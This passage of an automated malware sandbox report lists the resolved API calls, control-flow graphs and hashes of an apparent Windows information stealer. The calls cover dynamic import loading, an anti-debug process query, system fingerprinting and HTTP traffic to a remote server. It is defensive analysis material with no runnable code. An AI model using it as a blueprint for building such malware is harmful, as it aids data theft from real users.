                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39338), ref: 00419EEF
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39170), ref: 00419F07
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E393B0), ref: 00419F1F
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39188), ref: 00419F38
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E04F60), ref: 00419F50
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E391A0), ref: 00419F68
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39350), ref: 00419F81
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E026F0), ref: 00419F99
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39260), ref: 00419FB1
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02710), ref: 00419FCA
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E392A8), ref: 00419FE2
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E391D0), ref: 00419FFA
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02770), ref: 0041A013
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E024B0), ref: 0041A02B
                                                                                    • LoadLibraryA.KERNEL32(02E393F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                                                    • LoadLibraryA.KERNEL32(02E39278,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                                                    • LoadLibraryA.KERNEL32(02E393E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                                                    • LoadLibraryA.KERNEL32(02E39158,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                                                    • LoadLibraryA.KERNEL32(02E391E8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                                                    • LoadLibraryA.KERNEL32(02E39200,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                                                    • LoadLibraryA.KERNEL32(02E392C0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                                                    • LoadLibraryA.KERNEL32(02E39218,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                                                    • GetProcAddress.KERNEL32(75290000,02E024D0), ref: 0041A0DA
                                                                                    • GetProcAddress.KERNEL32(75290000,02E39248), ref: 0041A0F2
                                                                                    • GetProcAddress.KERNEL32(75290000,02E35EC0), ref: 0041A10A
                                                                                    • GetProcAddress.KERNEL32(75290000,02E392D8), ref: 0041A123
                                                                                    • GetProcAddress.KERNEL32(75290000,02E02410), ref: 0041A13B
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E05B50), ref: 0041A160
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E023B0), ref: 0041A179
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E05B00), ref: 0041A191
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E392F0), ref: 0041A1A9
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E39308), ref: 0041A1C2
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E025F0), ref: 0041A1DA
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E02210), ref: 0041A1F2
                                                                                    • GetProcAddress.KERNEL32(735B0000,02E39368), ref: 0041A20B
                                                                                    • GetProcAddress.KERNEL32(752C0000,02E02490), ref: 0041A22C
                                                                                    • GetProcAddress.KERNEL32(752C0000,02E02370), ref: 0041A244
                                                                                    • GetProcAddress.KERNEL32(752C0000,02E39380), ref: 0041A25D
                                                                                    • GetProcAddress.KERNEL32(752C0000,02E39398), ref: 0041A275
                                                                                    • GetProcAddress.KERNEL32(752C0000,02E02290), ref: 0041A28D
                                                                                    • GetProcAddress.KERNEL32(74EC0000,02E05A38), ref: 0041A2B3
                                                                                    • GetProcAddress.KERNEL32(74EC0000,02E05DF8), ref: 0041A2CB
                                                                                    • GetProcAddress.KERNEL32(74EC0000,02E39488), ref: 0041A2E3
                                                                                    • GetProcAddress.KERNEL32(74EC0000,02E02470), ref: 0041A2FC
                                                                                    • GetProcAddress.KERNEL32(74EC0000,02E025B0), ref: 0041A314
                                                                                    • GetProcAddress.KERNEL32(74EC0000,02E05E48), ref: 0041A32C
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E39440), ref: 0041A352
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E02550), ref: 0041A36A
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E35F40), ref: 0041A382
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E39500), ref: 0041A39B
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E394B8), ref: 0041A3B3
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E025D0), ref: 0041A3CB
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E024F0), ref: 0041A3E4
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E394E8), ref: 0041A3FC
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E39470), ref: 0041A414
                                                                                    • GetProcAddress.KERNEL32(75A70000,02E02510), ref: 0041A436
                                                                                    • GetProcAddress.KERNEL32(75A70000,02E39458), ref: 0041A44E
                                                                                    • GetProcAddress.KERNEL32(75A70000,02E394A0), ref: 0041A466
                                                                                    • GetProcAddress.KERNEL32(75A70000,02E394D0), ref: 0041A47F
                                                                                    • GetProcAddress.KERNEL32(75A70000,02E39758), ref: 0041A497
                                                                                    • GetProcAddress.KERNEL32(75450000,02E02230), ref: 0041A4B8
                                                                                    • GetProcAddress.KERNEL32(75450000,02E023F0), ref: 0041A4D1
                                                                                    • GetProcAddress.KERNEL32(75DA0000,02E022B0), ref: 0041A4F2
                                                                                    • GetProcAddress.KERNEL32(75DA0000,02E39548), ref: 0041A50A
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E02590), ref: 0041A530
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E023D0), ref: 0041A548
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E02250), ref: 0041A560
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E397A0), ref: 0041A579
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E022F0), ref: 0041A591
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E02430), ref: 0041A5A9
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E02270), ref: 0041A5C2
                                                                                    • GetProcAddress.KERNEL32(6F070000,02E02450), ref: 0041A5DA
                                                                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                                                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                                                                    • GetProcAddress.KERNEL32(75AF0000,02E39788), ref: 0041A629
                                                                                    • GetProcAddress.KERNEL32(75AF0000,02E35E30), ref: 0041A641
                                                                                    • GetProcAddress.KERNEL32(75AF0000,02E39560), ref: 0041A659
                                                                                    • GetProcAddress.KERNEL32(75AF0000,02E397E8), ref: 0041A672
                                                                                    • GetProcAddress.KERNEL32(75D90000,02E02530), ref: 0041A693
                                                                                    • GetProcAddress.KERNEL32(6C3E0000,02E39578), ref: 0041A6B4
                                                                                    • GetProcAddress.KERNEL32(6C3E0000,02E022D0), ref: 0041A6CD
                                                                                    • GetProcAddress.KERNEL32(6C3E0000,02E39668), ref: 0041A6E5
                                                                                    • GetProcAddress.KERNEL32(6C3E0000,02E395C0), ref: 0041A6FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                    • API String ID: 2238633743-1775429166
                                                                                    • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                                    • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                                                    • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                                    • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 673 419b46-419b4d 672->673 674 419b16-419b41 GetProcAddress * 2 672->674 676 419b68-419b6f 673->676 677 419b4f-419b63 GetProcAddress 673->677 674->673 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E08DD0), ref: 004198A1
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E08DE8), ref: 004198BA
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E08E00), ref: 004198D2
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E08D58), ref: 004198EA
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E08D10), ref: 00419903
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E34250), ref: 0041991B
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E026B0), ref: 00419933
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02850), ref: 0041994C
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E08A70), ref: 00419964
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E358B8), ref: 0041997C
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35A50), ref: 00419995
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35840), ref: 004199AD
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02870), ref: 004199C5
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35858), ref: 004199DE
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E359A8), ref: 004199F6
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E027D0), ref: 00419A0E
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35990), ref: 00419A27
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35AB0), ref: 00419A3F
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E028F0), ref: 00419A57
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35900), ref: 00419A70
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02890), ref: 00419A88
                                                                                    • LoadLibraryA.KERNEL32(02E35A20,?,00416A00), ref: 00419A9A
                                                                                    • LoadLibraryA.KERNEL32(02E359C0,?,00416A00), ref: 00419AAB
                                                                                    • LoadLibraryA.KERNEL32(02E35978,?,00416A00), ref: 00419ABD
                                                                                    • LoadLibraryA.KERNEL32(02E35A80,?,00416A00), ref: 00419ACF
                                                                                    • LoadLibraryA.KERNEL32(02E35918,?,00416A00), ref: 00419AE0
                                                                                    • GetProcAddress.KERNEL32(75A70000,02E359D8), ref: 00419B02
                                                                                    • GetProcAddress.KERNEL32(75290000,02E35870), ref: 00419B23
                                                                                    • GetProcAddress.KERNEL32(75290000,02E358D0), ref: 00419B3B
                                                                                    • GetProcAddress.KERNEL32(75BD0000,02E35AC8), ref: 00419B5D
                                                                                    • GetProcAddress.KERNEL32(75450000,02E028B0), ref: 00419B7E
                                                                                    • GetProcAddress.KERNEL32(76E90000,02E342A0), ref: 00419B9F
                                                                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                                                                    Strings
                                                                                    • NtQueryInformationProcess, xrefs: 00419BAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: NtQueryInformationProcess
                                                                                    • API String ID: 2238633743-2781105232
                                                                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                    • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                    • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 0040493A
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,02E3B5C0), ref: 00404DE8
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                                                    • HttpOpenRequestA.WININET(00000000,02E3B650,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00404B15
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                    • String ID: "$"$------$------$------
                                                                                    • API String ID: 2402878923-2180234286
                                                                                    • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                                                    • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

                                                                                     Control-flow Graph: function 406280 (rendered graph not reproduced here)
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406303
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID: ERROR$ERROR$GET
                                                                                    • API String ID: 3074848878-2509457195
                                                                                    • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                    • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                                                    • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                    • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                                                     Control-flow Graph: function 4117a0 (rendered graph not reproduced here)
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcessstrtok_s
                                                                                    • String ID: block
                                                                                    • API String ID: 3407564107-2199623458
                                                                                    • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                    • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                                                    • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                    • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                                                     Control-flow Graph: function 415510 (rendered graph not reproduced here)
                                                                                    APIs
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                      • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                      • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3630751533-2791005934
                                                                                    • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                                                    • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                                                     Control-flow Graph: function 417500 (rendered graph not reproduced here)
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                                                    • wsprintfA.USER32 ref: 00417640
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    Strings
